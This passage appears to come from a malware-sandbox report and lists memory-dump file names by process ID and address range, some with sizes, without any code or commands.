memory/3836-175-0x00007FFECED60000-0x00007FFECF821000-memory.dmpFilesize
10.8MB
-
memory/3836-162-0x0000000000000000-mapping.dmp
-
memory/3916-148-0x0000000000000000-mapping.dmp
-
memory/4068-201-0x0000000000000000-mapping.dmp
-
memory/4080-212-0x0000000000000000-mapping.dmp
-
memory/4124-203-0x0000000000000000-mapping.dmp
-
memory/4196-228-0x0000000000000000-mapping.dmp
-
memory/4196-160-0x0000000000000000-mapping.dmp
-
memory/4224-209-0x0000000000000000-mapping.dmp
-
memory/4264-146-0x0000000000000000-mapping.dmp
-
memory/4400-167-0x0000000000000000-mapping.dmp
-
memory/4412-144-0x0000000000000000-mapping.dmp
-
memory/4472-172-0x0000000000000000-mapping.dmp
-
memory/4524-169-0x0000000000000000-mapping.dmp
-
memory/4544-157-0x0000000000000000-mapping.dmp
-
memory/4564-224-0x0000000000000000-mapping.dmp
-
memory/4656-161-0x0000000000000000-mapping.dmp
-
memory/4664-225-0x0000000000000000-mapping.dmp
-
memory/4704-229-0x0000029203900000-0x0000029203907000-memory.dmpFilesize
28KB
-
memory/4704-230-0x00007FFECEF20000-0x00007FFECF9E1000-memory.dmpFilesize
10.8MB
-
memory/4704-231-0x00007FFECEF20000-0x00007FFECF9E1000-memory.dmpFilesize
10.8MB
-
memory/4832-205-0x0000000000000000-mapping.dmp
-
memory/4852-226-0x0000000000000000-mapping.dmp
-
memory/4864-221-0x0000000000000000-mapping.dmp
-
memory/4908-178-0x00007FFECED60000-0x00007FFECF821000-memory.dmpFilesize
10.8MB
-
memory/4908-136-0x0000000000A80000-0x0000000000D0E000-memory.dmpFilesize
2.6MB
-
memory/4908-138-0x00007FFECED60000-0x00007FFECF821000-memory.dmpFilesize
10.8MB
-
memory/4908-145-0x00000000038E0000-0x00000000038F2000-memory.dmpFilesize
72KB
-
memory/4908-142-0x00007FFECED60000-0x00007FFECF821000-memory.dmpFilesize
10.8MB
-
memory/4908-133-0x0000000000000000-mapping.dmp
-
memory/4920-165-0x0000000000000000-mapping.dmp
-
memory/4976-159-0x0000000000000000-mapping.dmp
-
memory/4992-152-0x0000000000000000-mapping.dmp
-
memory/5040-149-0x0000000000000000-mapping.dmp
-
memory/5068-168-0x0000000000000000-mapping.dmp